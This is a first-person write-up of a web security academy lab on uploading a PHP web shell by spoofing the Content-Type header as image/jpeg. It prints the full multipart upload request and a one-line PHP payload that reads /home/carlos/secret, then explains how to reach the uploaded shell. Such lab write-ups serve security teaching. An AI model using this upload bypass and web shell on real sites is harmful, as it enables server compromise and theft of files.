Web shell upload via Content-Type restriction bypass

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

Upon initiating the session, I delved into the upload functionality. With the proxy configured to monitor all requests and the Images checkbox enabled in the Filter settings, I uncovered a revealing GET request fetching the uploaded image. The directory was exposed as /files/avatars/<UPLOADED-FILE>. Attempting to upload my PHP file from a previous lab proved futile, as the server rejected it, citing "Sorry, file type application/octet-stream is not allowed. Only image/jpeg and image/png are allowed. Sorry, there was an error uploading your file."

In response, I opted to modify the Content-Type header of the upload request to image/jpeg:

POST /my-account/avatar HTTP/2
Host: ****.web-security-academy.net
Content-Length: 459
...
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

------WebKitFormBoundaryb6SRW1bH6V86hKfR
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: image/jpeg

<?php echo file_get_contents('/home/carlos/secret'); ?>
------WebKitFormBoundaryb6SRW1bH6V86hKfR
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryb6SRW1bH6V86hKfR
Content-Disposition: form-data; name="csrf"

utavcVKwL1TS6YHew5KZ7FE07cQgavji
------WebKitFormBoundaryb6SRW1bH6V86hKfR--

The payload included a simple PHP script as the avatar content:

<?php echo file_get_contents('/home/carlos/secret'); ?>

By uploading this webshell and navigating to https://YOUR-URL/files/avatars/shell.php, I successfully accessed the content of the /home/carlos/secret file, thereby resolving the lab.